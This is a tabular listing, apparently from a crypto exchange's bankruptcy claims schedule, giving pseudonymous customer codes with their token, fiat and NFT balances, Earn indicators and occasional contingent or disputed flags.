| 07369270 | | BRZ[3], BTC[0], CUSDT[3], TRX[3], USD[0.00] | | |
| 07369271 | | DOGE[672.56668879], ETH[.00539667], ETHW[.00539667], TRX[1], USD[0.00] | | |
| 07369272 | | CUSDT[3], DOGE[1067.90526204], USD[0.00] | | |
| 07369273 | | USD[10.00] | | |
| 07369274 | | USD[10.00] | | |
| 07369275 | | USD[10.00] | | |
| 07369276 | | CUSDT[6.72743466], SHIB[300197.93500308], USD[0.00] | Yes | |
| 07369277 | | ETH[.00544687], ETHW[.00544687], USD[0.00] | | |
| 07369278 | | DOGE[92.96347725], LINK[1.16301123], TRX[1], USD[10.00] | | |
| 07369279 | | USD[0.00] | | |
| 07369280 | | USD[10.00] | | |
| 07369281 | | USD[10.00] | | |
| 07369283 | | USD[10.00] | | |
| 07369285 | | USD[10.00] | | |
| 07369288 | | CUSDT[5], DOGE[.00001355], TRX[1], USD[0.00] | | |
| 07369290 | | USD[10.00] | | |
| 07369291 | | BCH[0.02416450], BTC[.00069059], CUSDT[8], DOGE[2.76643802], NFT (289345905870038847/White.Witch.Marble)[1], NFT (296758569337905775/Romeo #3213)[1], NFT (297959293295121315/werewolf #2)[1], NFT (307058247043014956/Queen Of Dracula)[1], NFT (313374502332364832/The sizzled cabbage)[1], NFT (323154404462328434/werewolf #1)[1], NFT (333463819771431631/Cyber#3)[1], NFT (364134211624427286/werewolf #3)[1], NFT (398297966133236910/Gloom Punk #3266)[1], NFT (422305669502361049/CREEPY MINI #13)[1], NFT (426479497369582697/Pretto #8)[1], NFT (451755899831675019/The General 20)[1], NFT (452646235356090003/ApexDucks #2237)[1], NFT (461105188721304117/Gloom Punk #1037)[1], NFT (464130021587165454/Kaylee)[1], NFT (467373707352229258/Travel sprouts collection #18)[1], NFT (476940282891695461/ovid-19#66)[1], NFT (490690630927674248/Blood Skies)[1], NFT (505860208727214156/Gangster Gorillas #8347)[1], NFT (510097964278208445/The Dude #2)[1], NFT (510736901722535922/Gangster Gorillas #7714)[1], NFT (515813426572159485/Green.Magnetic.Marble)[1], NFT (529606810975475818/Cute Axolotls Collection #48)[1], NFT (540118233244000960/Gloom Punk #5384)[1], NFT (548573472170110206/Mob cats collection #62)[1], NFT (553346474784592249/Legendary Devil Ape)[1], NFT (561781182832101697/Mob cats collection #216)[1], NFT (563638832540114164/Mob cats collection #151)[1], NFT (564002930992543019/Travel sprouts collection #19)[1], SHIB[2], SOL[.14589669], TRX[2], USD[0.94] | Yes | |
| 07369292 | | LTC[.00199046], USD[1.43] | | |
| 07369293 | | SOL[.0031825], USD[0.01], USDT[0.00000001] | | |
| 07369294 | | BRZ[2], BTC[0], CUSDT[3], DOGE[10.14894572], ETH[0], GRT[0], SUSHI[0], TRX[1], UNI[0], USD[0.00] | | |
| 07369295 | | ETH[.1776], ETHW[.1776], MATIC[1470], SOL[80.29377613], USD[1.41], USDT[42.51925415] | | |
| 07369297 | | USD[10.00] | | |
| 07369298 | | USD[10.00] | | |
| 07369299 | | USD[10.00] | | |
| 07369300 | | BAT[2], BTC[0], CUSDT[1], ETH[0], LTC[0], SOL[0], TRX[2], USD[0.00] | | |
| 07369302 | | USD[0.00] | | |
| 07369303 | | USD[0.00] | | |
| 07369304 | | USD[10.00] | | |
| 07369305 | | ETH[.000728], ETHW[.000728], SOL[.0096], TRX[.000001], USD[0.37], USDT[.007061] | | |
| 07369306 | | SHIB[1], TRX[1], USD[0.00] | | |
| 07369307 | | USD[8.63] | | |
| 07369308 | | USD[10.00] | | |
| 07369309 | | DOGE[1], ETH[.10163977], ETHW[.10163977], USD[757.50] | | |
| 07369310 | | DOGE[0.17301540], ETH[0], ETHW[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], YFI[0] | Yes | |
| 07369311 | | USD[10.00] | | |
| 07369312 | | USD[10.00] | | |
| 07369313 | | DOGE[583.83445292], TRX[93.94958914], USD[0.00] | | |
| 07369314 | | BAT[1], CUSDT[2], TRX[2315.02113035], USD[0.00] | | |
| 07369315 | | USD[0.00] | | |
| 07369316 | | DOGE[21.8523048], USD[0.00] | Yes | |
| 07369317 | | USD[10.00] | | |
| 07369318 | | USD[10.00] | | |
| 07369319 | | SOL[1.20463578], TRX[1], USD[0.00] | Yes | |
| 07369320 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369322 | | USD[57.35] | | |
| 07369324 | | USD[4.13] | | |
| 07369325 | | USD[10.00] | | |
| 07369327 | | DOGE[18.87915441], USD[0.00] | | |
| 07369328 | | USD[10.00] | | |
| 07369329 | | CUSDT[1], USD[0.06] | | |
| 07369330 | | DOGE[1], USD[0.00] | | |
| 07369331 | | USD[10.00] | | |
| 07369333 | | CUSDT[3], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07369334 | | USD[0.00] | | |
| 07369335 | | USD[10.00] | | |
| 07369336 | | CUSDT[3], DOGE[1], TRX[3], USD[0.00] | | |
| 07369337 | | USD[0.00] | | |
| 07369338 | | USD[10.00] | | |
| 07369339 | | ETH[.00535877], ETHW[.00535877], USD[0.00] | | |
| 07369340 | | BTC[0.01937131], CUSDT[2], ETH[.2060199], ETHW[.2058037], TRX[526.9415926], USD[0.00] | Yes | |
| 07369341 | | USD[10.00] | | |
| 07369343 | | USD[10.00] | | |
| 07369344 | | USD[10.00] | | |
| 07369346 | | BRZ[1], CUSDT[1], GRT[0], TRX[2], USD[0.00], USDT[42.37641332] | Yes | |
| 07369347 | | USD[10.00] | | |
| 07369349 | | BRZ[1], CUSDT[15], DOGE[2], ETH[.05406716], ETHW[.05339684], KSHIB[125.65238719], PAXG[.00012491], TRX[1], USD[0.00] | Yes | |
| 07369350 | | BRZ[3], BTC[.00000104], CUSDT[2], DOGE[1.07269006], TRX[.08519062], USD[0.68] | | |
| 07369352 | | USD[10.00] | | |
| 07369353 | | CUSDT[1], USD[0.01] | | |
| 07369354 | | CUSDT[3], DOGE[402.09124088], SOL[1.18856849], USD[0.03] | Yes | |
| 07369355 | | USD[0.00] | | |
| 07369356 | | USD[10.00] | | |
| 07369357 | | BF_POINT[200], USD[0.00] | | |
| 07369358 | | BRZ[0], BTC[0], DOGE[2.00310783], USD[0.00] | | |
| 07369359 | | CUSDT[2], DOGE[.04930686], TRX[1], USD[0.00] | | |
| 07369360 | | BTC[.00017299], USD[0.00] | | |
| 07369361 | | USD[10.00] | | |
| 07369362 | | USD[10.00] | | |
| 07369363 | | TRX[1], USD[0.00] | Yes | |
| 07369364 | | DOGE[.14815], MATIC[8.328], MKR[.0009525], NEAR[.06015], SOL[.00482006], USD[19.23] | | |
| 07369366 | | DOGE[.87699275], LINK[.2850916], USD[0.75] | Yes | |
| 07369367 | | DOGE[.45408489], USD[0.00] | | |
| 07369368 | | USD[10.00] | | |
| 07369369 | | USD[10.00] | | |
| 07369370 | | USD[0.00] | | |
| 07369371 | | USD[10.00] | | |
| 07369372 | | BTC[0], USD[13.11] | | |
| 07369375 | | USD[10.00] | | |
| 07369376 | | USD[10.00] | | |
| 07369377 | | USD[10.00] | | |
| 07369379 | | USD[10.00] | | |
| 07369380 | | BAT[2], BRZ[1], CUSDT[1], TRX[2], USD[0.00], USDT[0] | | |
| 07369381 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07369382 | | USD[10.00] | | |
| 07369383 | | DOGE[149.17350039], TRX[78.56897807], USD[4.32] | | |
| 07369384 | | DOGE[301.85386234], SHIB[2489893.50435276], USD[0.00] | | |
| 07369385 | | USD[10.00] | | |
| 07369386 | | USD[10.00] | | |
| 07369387 | | USD[10.94] | Yes | |
| 07369388 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07369389 | | BRZ[4], CUSDT[3], SOL[1.11056299], TRX[3826.70004472], USD[0.00], USDT[1.11043116] | Yes | |
| 07369390 | | BRZ[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369391 | | DOGE[1], USD[0.00] | | |
| 07369392 | | USD[3741.09] | Yes | |
| 07369394 | | USD[0.00] | | |
| 07369395 | | USD[10.00] | | |
| 07369396 | | BRZ[1], BTC[.00022349], TRX[1], USD[0.01] | | |
| 07369397 | | BRZ[2], CUSDT[11], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07369399 | | DOGE[378.20803615], USD[0.00] | | |
| 07369400 | | CUSDT[9], DOGE[80.48958699], TRX[4], USD[0.01] | | |
| 07369401 | | BAT[1], TRX[1], USD[0.01] | | |
| 07369402 | | USD[10.00] | | |
| 07369403 | | USD[10.00] | | |
| 07369405 | | BTC[0], EUR[0.00], SOL[0], TRX[0], USD[0.00] | | |
| 07369407 | | USD[10.00] | | |
| 07369408 | | BAT[.39805193], BRZ[4], CUSDT[18], DOGE[332.40611339], TRX[.0000446], USD[361.79], USDT[6.62548912] | Yes | |
| 07369409 | | CUSDT[1], DOGE[6795.13297401], USD[0.00] | Yes | |
| 07369410 | | USD[0.00] | | |
| 07369411 | | CUSDT[3], DOGE[2], SOL[0], USD[48.66] | Yes | |
| 07369413 | | USD[0.00] | | |
| 07369414 | | BRZ[1], USD[0.00] | | |
| 07369415 | | USD[10.00] | | |
| 07369417 | | BAT[2], BRZ[2], CUSDT[7], GRT[3], SUSHI[1], TRX[7], USD[0.01], USDT[3] | | |
| 07369418 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07369419 | | CUSDT[9.9081029], USD[0.00] | | |
| 07369420 | | DOGE[1], USD[0.00] | | |
| 07369422 | | CUSDT[2], DOGE[792.72729186], SHIB[264659.42505009], USD[0.00] | | |
| 07369423 | | USD[10.00] | | |
| 07369424 | | DOGE[35.67719826], USD[0.00] | | |
| 07369425 | | LTC[.06261531], USD[0.00] | | |
| 07369426 | | SUSHI[.65000161], USD[0.00] | | |
| 07369427 | | BAT[.00012022], BRZ[.00005838], BTC[0], CUSDT[0], DAI[0], ETH[0], ETHW[0], GRT[1], LINK[0], PAXG[0], SHIB[5], SOL[0], USD[0.00], USDT[.00000022] | Yes | |
| 07369428 | | USD[10.00] | | |
| 07369429 | | CUSDT[4], DOGE[162.2075581], ETH[.64235692], ETHW[.64235692], TRX[2], USD[0.00] | | |
| 07369432 | | DOGE[1747.33365533], GRT[1], SHIB[2023244.17271215], TRX[12.01579119], USD[0.00], USDT[0] | Yes | |
| 07369433 | Contingent, Disputed | USD[0.00] | | |
| 07369434 | | BAT[0], GRT[0], LTC[0], SUSHI[0], UNI[0], USD[0.01] | Yes | |
| 07369435 | | USD[0.01], USDT[0] | | |
| 07369437 | | USD[10.00] | | |
| 07369438 | | USD[10.00] | | |
| 07369442 | | USD[10.00] | | |
| 07369443 | | BAT[.00007469], USD[0.00] | | |
| 07369445 | | USD[0.05] | | |
| 07369446 | | USD[10.00] | | |
| 07369448 | | USD[10.00] | | |
| 07369449 | | USD[10.00] | | |
| 07369450 | | USD[10.00] | | |
| 07369451 | | USD[10.00] | | |
| 07369453 | | USD[10.00] | Yes | |
| 07369454 | | AAVE[.00232379], AUD[0.00], BAT[.01500067], BCH[.00034374], BF_POINT[200], BRZ[.00884698], BTC[.00002137], CAD[0.00], CHF[0.04], CUSDT[35.32353016], DAI[.01224261], DOGE[3.00394732], ETH[0.00000644], ETHW[0.00000644], EUR[0.04], GBP[0.00], GRT[1.10630624], HKD[0.33], LINK[0.03406157], LTC[0.00250125], MATIC[0.09095857], MKR[0.00000360], PAXG[0.00045376], SGD[0.06], SOL[0.00823380], SUSHI[0.07302570], TRX[0.09660387], UNI[0.00007718], USD[0.00], USDT[0.01219991], YFI[0.00002428], ZAR[0.60] | Yes | |
| 07369455 | | USD[10.00] | | |
| 07369456 | | USD[10.00] | | |
| 07369457 | | USD[10.00] | | |
| 07369458 | | BRZ[3], CUSDT[9.01122887], DOGE[212.68799539], LTC[.00000914], TRX[1], USD[0.01] | Yes | |
| 07369460 | | USD[10.00] | | |
| 07369461 | | USD[10.00] | | |
| 07369463 | | USD[10.00] | | |
| 07369464 | | DOGE[19.66203092], USD[0.00] | | |
| 07369465 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369466 | | BTC[0.00016618], GRT[54.945], SUSHI[11.988], TRX[.000001], USD[0.97] | | |
| 07369467 | | BAT[9.75787014], BCH[.0230155], BRZ[132.04772508], BTC[.00217072], CUSDT[1113.43762188], DOGE[1843.69797300], ETH[.06059484], ETHW[.05984244], GRT[7.54094987], LINK[.27500374], LTC[.00318121], SHIB[.04671832], SOL[.00001093], SUSHI[6.91507018], TRX[96.24252053], USD[0.00] | Yes | |
| 07369469 | | BAT[1], BRZ[1], CUSDT[1], DOGE[0], GRT[1], TRX[6964.12292805], USD[0.00], USDT[1] | | |
| 07369470 | | BAT[75.98127441], BRZ[1], CUSDT[4], DOGE[6118.15049415], SOL[1.22096947], TRX[8119.26957773], USD[50.00], USDT[1] | | |
| 07369471 | | BTC[0], USD[44.93], USDT[949.07000000] | | |
| 07369472 | | DOGE[1], GRT[54.4401554], USD[0.00] | | |
| 07369473 | | USD[10.00] | | |
| 07369474 | | USD[10.00] | | |
| 07369475 | | SOL[.25475174], USD[0.00] | | |
| 07369476 | | USD[10.00] | | |
| 07369477 | | DOGE[25.35923061], USD[0.00] | | |
| 07369478 | | BRZ[0.00000001], BTC[.01391895], CUSDT[16], DOGE[2], ETH[.36503421], ETHW[.36488103], SHIB[1], TRX[4], USD[0.00], USDT[0.00000001] | Yes | |
| 07369479 | | BAT[1.0165555], CUSDT[4], DOGE[1.02337264], GRT[1.00498957], SHIB[1005633.29944933], USD[535.57], USDT[0.00001008] | Yes | |
| 07369480 | | BRZ[1], CUSDT[2], DOGE[30.32038454], SHIB[211982.87963651], SUSHI[.02036197], TRX[6], USD[4.01] | Yes | |
| 07369481 | | BTC[0], CUSDT[3], DOGE[2.33845680], TRX[1], USD[0.90] | Yes | |
| 07369483 | | GRT[4.16820136], USD[0.00] | | |
| 07369485 | | DOGE[25.03224929], USD[0.00] | | |
| 07369486 | | USD[10.00] | | |
| 07369487 | | USD[10.00] | | |
| 07369488 | | USD[10.98] | Yes | |
| 07369489 | | ETH[.0054912], ETHW[.0054912], TRX[1], USD[0.00] | | |
| 07369491 | | USD[10.00] | | |
| 07369492 | | BTC[.00008239], CUSDT[15], DOGE[.53768134], SOL[.01985629], TRX[4.92278625], USD[0.00] | | |
| 07369493 | | USD[10.00] | | |
| 07369495 | | USD[10.00] | | |
| 07369496 | | DOGE[3], GRT[25.61781906], TRX[2], USD[0.00] | | |
| 07369498 | | USD[11.03] | Yes | |
| 07369499 | | BAT[1.01655550], BF_POINT[100], BRZ[3], BTC[0], CUSDT[1], DOGE[21690.93362232], ETH[0], GRT[0], SOL[0], TRX[6869.40509617], USD[0.00] | Yes | |
| 07369500 | | BTC[.00259357], CUSDT[1], DOGE[2098.05638292], USD[10.00] | | |
| 07369502 | | BTC[.0073926], ETH[.001731], ETHW[.001731], USD[1.40] | | |
| 07369503 | | USD[0.01] | Yes | |
| 07369504 | | CUSDT[1], DOGE[1835.62863397], USD[10.00] | | |
| 07369505 | | USD[10.00] | | |
| 07369506 | | BTC[.00020267], DOGE[366.17069937], ETH[.00309206], ETHW[.00309206], TRX[1], USD[0.00] | | |
| 07369507 | | BAT[1.00025664], BRZ[4], CUSDT[56.50653061], DOGE[397.89813235], NFT (35213601758704695/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #13)[1], NFT (389391630386663201/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #12)[1], NFT (444893042424416136/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #7)[1], NFT (521883889363762716/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #8)[1], NFT (544549933074345423/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #7)[1], NFT (552320392271851979/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #11)[1], SOL[1.24986959], TRX[10.00087675], USD[21.10], USDT[1.09943246] | Yes | |
| 07369508 | | AVAX[.00000152], BCH[0], CUSDT[3], DAI[0], DOGE[.00073213], ETH[0], ETHW[0.00842283], KSHIB[200.88705086], NEAR[.00001649], SHIB[16], TRX[1.00568850], UNI[.00000785], USD[0.00], USDT[.000137] | Yes | |
| 07369509 | | USD[10.00] | | |
| 07369510 | | BRZ[1], CUSDT[0], DOGE[0], USD[0.00] | | |
| 07369512 | | ETHW[52.7784418], NFT (371592634917696893/The Hill by FTX #6122)[1], NFT (475624013214646258/Serum Surfers X Crypto Bahamas #94)[1], SGD[12.99], SOL[33.39437746], USD[-75.94], USDT[0] | Yes | |
| 07369513 | | DOGE[5741.15157436], TRX[1], USD[0.00] | | |
| 07369514 | | BCH[.00004499], CUSDT[59.32600361], DOGE[.30848049], LTC[.00529233], PAXG[.00005447], SOL[.0005184], TRX[1.82939428], USD[-1.44], USDT[0.00000371] | Yes | |
| 07369515 | | DOGE[.00004097], ETH[.00333963], ETHW[.00333963], USD[0.00] | | |
| 07369516 | | USD[10.00] | | |
| 07369517 | | BTC[.0000339], CUSDT[1], DOGE[0], PAXG[.00113008], USD[0.00], USDT[0] | | |
| 07369518 | | UNI[0], USD[0.00] | Yes | |
| 07369519 | | CUSDT[2], DOGE[1794.54937554], TRX[1], USD[0.00] | | |
| 07369520 | | BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], MATIC[0], SUSHI[0], USD[0.00] | Yes | |
| 07369522 | | DOGE[1], EUR[0.01], USD[0.00] | | |
| 07369523 | | BTC[.0001437], DOGE[1], USD[0.01] | Yes | |
| 07369524 | | CUSDT[1], ETH[0], USD[36.03] | | |
| 07369525 | | DOGE[1], TRX[2], USD[0.01] | | |
| 07369526 | | BTC[.0002977], CUSDT[1], DOGE[155.61824342], USD[50.00] | | |
| 07369528 | | CUSDT[1], DOGE[3], NFT (451001447015237364/Warriors 75th Anniversary Icon Edition Diamond #1213)[1], SUSHI[.234877], USD[0.01] | | |
| 07369529 | | USD[10.00] | | |
| 07369530 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369531 | | TRX[69.36143295], USD[0.00] | | |
| 07369532 | | DOGE[181.97991575], USD[0.00] | | |
| 07369533 | | BTC[.00093514], CUSDT[1], DOGE[1], USD[10.83] | | |
| 07369534 | | SHIB[2136710.07318193], USD[0.02] | | |
| 07369535 | | DOGE[1], GRT[6.02858580], USD[0.00] | | |
| 07369536 | | BRZ[1], CUSDT[4], DOGE[2.01872035], SHIB[83713971.63331955], TRX[9000.05198407], USD[514.90] | Yes | |
| 07369537 | | USD[10.00] | | |
| 07369538 | | DOGE[13.9235506], USD[0.00] | | |
| 07369539 | | DOGE[1], USD[10.00] | | |
| 07369540 | | DOGE[0.00000990], USD[0.00] | | |
| 07369541 | | USD[10.00] | | |
| 07369542 | | USD[0.00] | Yes | |
| 07369543 | | BTC[0], CUSDT[1], ETH[0], GRT[0], LINK[0], NFT (365945558411071310/FTX - Off The Grid Miami #397)[1], TRX[0], USD[0.00], USDT[0.00000001] | | |
| 07369544 | | TRX[1], USD[0.00] | | |
| 07369546 | | USD[10.00] | | |
| 07369547 | | CUSDT[1], USD[0.01] | | |
| 07369548 | | USD[10.00] | | |
| 07369549 | | TRX[200.16613789], USD[0.00] | | |
| 07369550 | | BRZ[1], DOGE[136.15767404], USD[0.00] | | |
| 07369552 | | CUSDT[1], DOGE[359.65650586], USD[30.00] | | |
| 07369553 | | USD[10.00] | | |
| 07369554 | | USD[10.00] | | |
| 07369555 | | USD[10.00] | | |
| 07369557 | | DOGE[.88924321], USD[0.00], USDT[.0062185] | | |
| 07369558 | | BRZ[2], CUSDT[2], SOL[1], TRX[1], USD[0.00], USDT[2] | | |
| 07369559 | | USD[10.00] | | |
| 07369560 | | SHIB[405727.5867798], USD[0.00] | Yes | |
| 07369561 | | USD[0.00], USDT[0] | | |
| 07369562 | | BRZ[0], BTC[0], DOGE[0], TRX[1.55100040] | | |
| 07369563 | | CUSDT[3], SOL[0], USD[0.00] | | |
| 07369564 | | USD[10.00] | | |
| 07369565 | | USD[10.00] | | |
| 07369566 | | USD[10.00] | | |
| 07369567 | | CUSDT[2], TRX[288.84598771], USD[0.01] | | |
| 07369568 | | BRZ[9], CUSDT[17], DOGE[23], TRX[9], USD[0.01], USDT[1.00000001] | | |
| 07369569 | | TRX[1], USD[0.00] | Yes | |
| 07369570 | | BRZ[1], CUSDT[7], DOGE[867.70988299], TRX[5], USD[0.00] | Yes | |
| 07369571 | | USD[10.00] | | |
| 07369572 | | USD[10.00] | | |
| 07369573 | | USD[10.00] | | |
| 07369574 | | DOGE[137.76317243], USD[0.00] | | |
| 07369575 | | USD[0.03], USDT[0] | | |
| 07369576 | | TRX[182.52468509], USD[0.00] | | |
| 07369577 | | USD[10.00] | | |
| 07369578 | | CUSDT[10], DOGE[0], SUSHI[0], USD[0.25] | | |
| 07369579 | | USD[10.00] | | |
| 07369580 | | USD[10.00] | | |
| 07369581 | | USD[10.00] | | |
| 07369582 | | DOGE[1], GRT[12.1572627], USD[10.00] | | |
| 07369583 | | CUSDT[1], ETH[.03302004], ETHW[.03302004], USD[10.00] | | |
| 07369584 | | CUSDT[1], TRX[1.97761283], USD[1.11], USDT[.87010388] | | |
| 07369585 | | USD[10.00] | | |
| 07369587 | | USD[10.00] | | |
| 07369588 | | BAT[10.95225955], DOGE[2], USD[0.00], USDT[0.00039777] | Yes | |
| 07369589 | | USD[10.00] | | |
| 07369590 | | BRZ[1], BTC[.02743231], CUSDT[105.16181399], DOGE[62.71383938], ETH[.94161213], ETHW[.94121653], GRT[20.80105695], NFT (343735679333479231/Coachella x FTX Weekend 1 #11315)[1], SOL[2.136827281], TRX[17.60616471], USD[230.76] | Yes | |
| 07369591 | | USD[0.00] | | |
| 07369593 | | BRZ[2], CUSDT[12], DOGE[1], ETH[.02945206], ETHW[.0290827], GRT[1.00367791], LINK[1.75665727], TRX[3], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369595 | | USD[10.00] | | |
| 07369596 | | USD[10.00] | | |
| 07369597 | | USD[10.00] | | |
| 07369598 | | DOGE[1], USD[11.04] | Yes | |
| 07369600 | | BRZ[3], CUSDT[1], DOGE[1], GRT[4.09748515], USD[0.01], USDT[1] | | |
| 07369601 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07369602 | | USD[22.40] | | |
| 07369603 | | USD[10.00] | | |
| 07369604 | | USD[10.00] | | |
| 07369605 | | DOGE[1868.09777368], USD[0.00] | | |
| 07369606 | | USD[10.00] | | |
| 07369607 | | USD[10.00] | | |
| 07369608 | | USD[10.00] | | |
| 07369609 | | USD[10.86] | Yes | |
| 07369610 | | SOL[1.62078713], USD[0.00], USDT[0.00000009] | | |
| 07369611 | | DOGE[38.02049465], TRX[75.82251889], USD[0.00] | | |
| 07369613 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07369614 | | USD[10.00] | | |
| 07369615 | | USD[10.00] | | |
| 07369616 | | BAT[334.07535717], BCH[1.17243573], CUSDT[0], ETH[.00000001], EUR[0.00], GRT[0], LINK[5.69567629], LTC[4.06614624], MATIC[20.67175390], NFT (371579534472330446/Valley #3)[1], NFT (460180177270973135/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #6)[1], NFT (487559160711857472/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #45)[1], SHIB[0], SOL[4.35748306], SUSHI[10.76596524], TRX[4772.08671447], USD[0.00], USDT[43.32083829] | Yes | |
| 07369618 | | DOGE[1.25924698], USD[0.00], USDT[0] | | |
| 07369619 | | CUSDT[4], DAI[9.93612926], DOGE[501.41650767], USD[0.02] | | |
| 07369620 | | USD[10.00] | | |
| 07369621 | | BRZ[3], CUSDT[2], DOGE[6001.52018506], TRX[2], USD[19.91] | | |
| 07369622 | | USD[10.00] | | |
| 07369623 | | BAT[0], ETH[0], ETHW[0], SOL[0], USD[0.00] | Yes | |
| 07369624 | | BTC[.00000264], DOGE[0], USD[0.00] | | |
| 07369625 | | BAT[2.04068207], BRZ[1], BTC[.00067065], CUSDT[146.28600109], DOGE[80.37264203], ETH[1.42253291], ETHW[1.42193537], LINK[2.19456985], SHIB[1], TRX[14.71989446], USD[0.00] | Yes | |
| 07369626 | | BTC[0], CUSDT[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07369627 | | CUSDT[1], DOGE[2], TRX[1], USD[0.00] | | |
| 07369628 | | BRZ[3], BTC[.00356154], CUSDT[1], GRT[57.50947609], TRX[1], USD[0.00] | Yes | |
| 07369629 | | BRZ[2], CUSDT[6], DOGE[100.35680579], TRX[1], USD[0.06] | | |
| 07369630 | | USD[10.00] | | |
| 07369631 | | USD[10.00] | | |
| 07369632 | | SHIB[133717.51459213], USD[0.00] | | |
| 07369634 | | USD[10.00] | | |
| 07369635 | | USD[10.00] | | |
| 07369636 | | CUSDT[1], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07369637 | | USD[10.00] | | |
| 07369638 | | BTC[.00000006], SHIB[.00116054], SUSHI[.00010228], USD[0.00] | Yes | |
| 07369639 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.41], USDT[0] | Yes | |
| 07369640 | | USD[10.00] | | |
| 07369641 | | USD[10.00] | | |
| 07369642 | | USD[10.00] | | |
| 07369643 | | DOGE[171.25712836], USD[0.00] | | |
| 07369644 | | USD[10.00] | | |
| 07369645 | | USD[10.00] | | |
| 07369646 | | USD[10.00] | | |
| 07369647 | | CUSDT[0], DOGE[0.03564967], GRT[0], SHIB[18.38902712], SOL[0.00000422], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07369648 | | DOGE[434.00204257], USD[0.00] | Yes | |
| 07369649 | | USD[0.01] | | |
| 07369650 | | DOGE[1], ETH[0], ETHW[0], LTC[0], TRX[0], USD[0.00] | | |
| 07369651 | | USD[0.00] | | |
| 07369652 | | USD[10.00] | | |
| 07369653 | | TRX[1], USD[10.00] | | |
| 07369654 | | BAT[0], BRZ[0], DOGE[1], USD[0.00] | Yes | |
| 07369655 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369656 | | USD[10.39] | Yes | |
| 07369658 | | SOL[0], USD[0.00] | | |
| 07369660 | | DOGE[138.84015984], TRX[1], USD[0.00] | | |
| 07369661 | | TRX[159.99513614], USD[0.00] | | |
| 07369662 | | CUSDT[1], DOGE[1], USD[0.18] | | |
| 07369663 | | USD[10.00] | | |
| 07369664 | | DOGE[.00000001], SHIB[1], USD[0.01] | | |
| 07369665 | | BAT[1], DOGE[1], ETH[0.00895425], ETHW[0.00895425], TRX[2], USD[0.01], USDT[1] | | |
| 07369666 | | USD[10.00] | | |
| 07369667 | | USD[10.00] | | |
| 07369668 | | USD[10.00] | | |
| 07369669 | | USD[10.00] | | |
| 07369670 | | USD[10.00] | | |
| 07369671 | | DOGE[312.76077200], USD[0.00] | | |
| 07369672 | | CUSDT[471.18136948], USD[0.00] | | |
| 07369673 | | CUSDT[1], TRX[.00003384], USD[0.00] | | |
| 07369674 | | DOGE[5294.43694615], USD[160.00], USDT[1] | | |
| 07369675 | | USD[10.00] | | |
| 07369676 | | BAT[0], BRZ[0], CUSDT[11], DAI[0], DOGE[0], LINK[0], MATIC[0], PAXG[0], SOL[0], TRX[0], USD[0.00], USDT[0.00000585], YFI[0] | Yes | |
| 07369677 | | CUSDT[1], TRX[1], UNI[0], USD[10.00] | | |
| 07369678 | | DOGE[0], ETH[0], LTC[0], SOL[0], SUSHI[0], USD[0.00] | Yes | |
| 07369680 | | USD[10.00] | | |
| 07369681 | | USD[10.00] | | |
| 07369682 | | CUSDT[1], DOGE[2755.17547024], SHIB[4779011.90876450], USD[63.32] | Yes | |
| 07369683 | | BAT[41.87526496], BTC[.04255544], CUSDT[21], DOGE[18224.34916721], GRT[52.78172487], TRX[1781.64657927], USD[9.57], USDT[1.02425274] | Yes | |
| 07369684 | | CUSDT[2], DOGE[37.94470071], USD[0.00] | | |
| 07369685 | | USD[10.00] | | |
| 07369686 | | ETH[0], USD[0.00] | | |
| 07369687 | | CUSDT[5], DOGE[375.30438748], TRX[1], USD[0.00] | | |
| 07369688 | | USD[20.00] | | |
| 07369689 | | USD[10.00] | | |
| 07369690 | | BTC[0], ETH[0], ETHW[0], GRT[0], LTC[0], SHIB[0], TRX[0], USD[0.00] | | |
| 07369691 | | CUSDT[2], DOGE[1], TRX[1], USD[18.22] | | |
| 07369692 | | USD[10.00] | | |
| 07369693 | | USD[10.00] | | |
| 07369694 | | USD[10.00] | | |
| 07369695 | | CUSDT[3], DOGE[0], USD[0.00] | | |
| 07369696 | | USD[10.00] | | |
| 07369697 | | USD[10.00] | | |
| 07369698 | | DOGE[122.68300869], USD[0.00] | | |
| 07369699 | | BRZ[0], DOGE[0], SHIB[0], USD[0.00], USDT[0] | Yes | |
